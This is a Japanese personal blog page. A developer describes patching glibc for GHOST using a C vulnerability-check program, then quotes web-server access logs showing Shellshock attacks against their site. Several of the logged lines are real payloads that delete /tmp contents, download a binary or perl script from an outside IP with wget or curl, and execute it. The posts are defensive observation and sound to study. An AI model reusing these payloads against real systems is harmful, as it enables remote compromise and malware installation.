FC2ブログ

スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

glibcの脆弱性CVE-2015-0235(GHOST)の対応

glibcにgethostbyname()の脆弱性があるということで、対応しないといけないというので、とりあえずglibcをupdateしました。

# yum update glibc

とりあえず

glibc.i686 2.5-123.el5_11.1 installed
glibc.x86_64 2.5-123.el5_11.1 installed

になりましたが、これが対応しているバージョンなのかよくわからないので
ネットにあった以下のようなチェックプログラムを使ってチェックしてみました。

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
char buffer[1024];
char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
struct hostent resbuf;
struct hostent *result;
int herrno;
int retval;

/*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
char name[sizeof(temp.buffer)];
memset(name, '0', len);
name[len] = '\0';
retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

if (strcmp(temp.canary, CANARY) != 0) {
puts("vulnerable");
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts("not vulnerable");
exit(EXIT_SUCCESS);
}
puts("should not happen");
exit(EXIT_FAILURE);
}


その結果 not vulnerable が表示されましたので、これでいいみたいですね。
この脆弱性に関する攻撃があるんでしょうかね。
スポンサーサイト

bashの脆弱性

しばらく気にしてなかったのですが、久々にaccessログをみると結構恐ろしいのがありました。


223.255.192.109 - - [09/Dec/2014:15:13:16 +0900] "GET / HTTP/1.1" 200 38 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.207.196:81/sss -O /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.207.196:81/sss -O /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo /tmp/China.Z-ctxj\xa8 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
50.28.33.253 - - [10/Dec/2014:16:05:22 +0900] "GET /cgi-bin/id.cgi HTTP/1.0" 404 289 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://217.199.160.244/mg;curl -O http://217.199.160.244/mg;perl mg;rm -rf mg\""


なんかファイルを仕込もうとしていますが、China.zってなんでしょうね。。

bashの脆弱性(さらに続き)

bashの脆弱性ですが、今まではトップページにだけアクセスしていたのですが、
今回はトップページ以下のリンクしているページを順に検査しているような
アクセスがありました。


8.37.217.199 - - [10/Oct/2014:06:52:07 +0900] "GET /room.php?room=1.1.53 HTTP/1.1" 200 9142 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.196 - - [10/Oct/2014:06:52:08 +0900] "GET /room.php?room=1.1.52 HTTP/1.1" 200 9142 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.197 - - [10/Oct/2014:06:52:08 +0900] "GET /room.php?room=1.1.51 HTTP/1.1" 200 9142 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.198 - - [10/Oct/2014:06:52:09 +0900] "GET /room.php?room=1.1.50 HTTP/1.1" 200 9139 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
・・・・


しかもアクセス元が、8.37.217.196から8.37.217.199と複数のアドレスからになっています。
何台も用意して攻撃をしかけようとしてるんでしょうかね。

bashの脆弱性(続き)

昨日に続いて、さらに攻撃らしいアクセスがありました。


118.192.48.6 - - [27/Sep/2014:21:05:16 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 301 "http://www.baidu.com" "() { :; }; echo X-Bash-Test: `echo qemzPlJGpn`;"
118.192.48.6 - - [27/Sep/2014:21:37:41 +0900] "GET /cgi-bin/count.cgi HTTP/1.1" 404 292 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo tZl2Wm91Bv`;"
118.192.48.6 - - [27/Sep/2014:21:37:41 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 291 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo GfaFQMxEAI`;"
118.192.48.6 - - [27/Sep/2014:21:37:41 +0900] "GET /cgi-bin/help.cgi HTTP/1.1" 404 291 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo RE7LJC2S9o`;"
118.192.48.6 - - [27/Sep/2014:21:37:41 +0900] "GET /cgi-bin/index.cgi HTTP/1.1" 404 292 "http://www.baidu.com" "() { :; }; echo Mozilla: `echo HukIfCQewT`;"


baiduを名乗っていますが、どこからかわかりませんね。
なんか、cgiの入門の勉強をして放置してあるのを狙っている感じですね。
echo Mozillaをしてどうするんでしょうかね?

bashの脆弱性

いま話題になっているbashの脆弱性ですが、
うちのサイトにも調査やら攻撃やらそれらしいアクセスがありました。


209.126.230.72 - - [25/Sep/2014:08:27:03 +0900] "GET / HTTP/1.0" 200 27471 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:16:26:23 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 301 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [26/Sep/2014:04:16:59 +0900] "GET / HTTP/1.1" 200 38 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"
54.251.83.67 - - [26/Sep/2014:17:39:34 +0900] "GET / HTTP/1.1" 200 38 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"


うちのサイトでは、bashを直接、間接呼び出すことはない(はず)なので、大丈夫だったと思いますが、
bashはupdateしておきました。
こわいですね。

プロフィール

chattera.net

Author:chattera.net
フリーでソフト開発の仕事をしています。
自作したこのチャットシステムは、何か世の中に役に立つこともあるかと思いますので、お呼びがかかるとうれしいですね。

連絡先は chatteranet@gmail.com です。

また、ソフト開発関連のお誘いもうけたまわっております。

最新記事
最新コメント
最新トラックバック
月別アーカイブ
カテゴリ
検索フォーム
RSSリンクの表示
リンク
ブロとも申請フォーム

この人とブロともになる

QRコード
QR
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。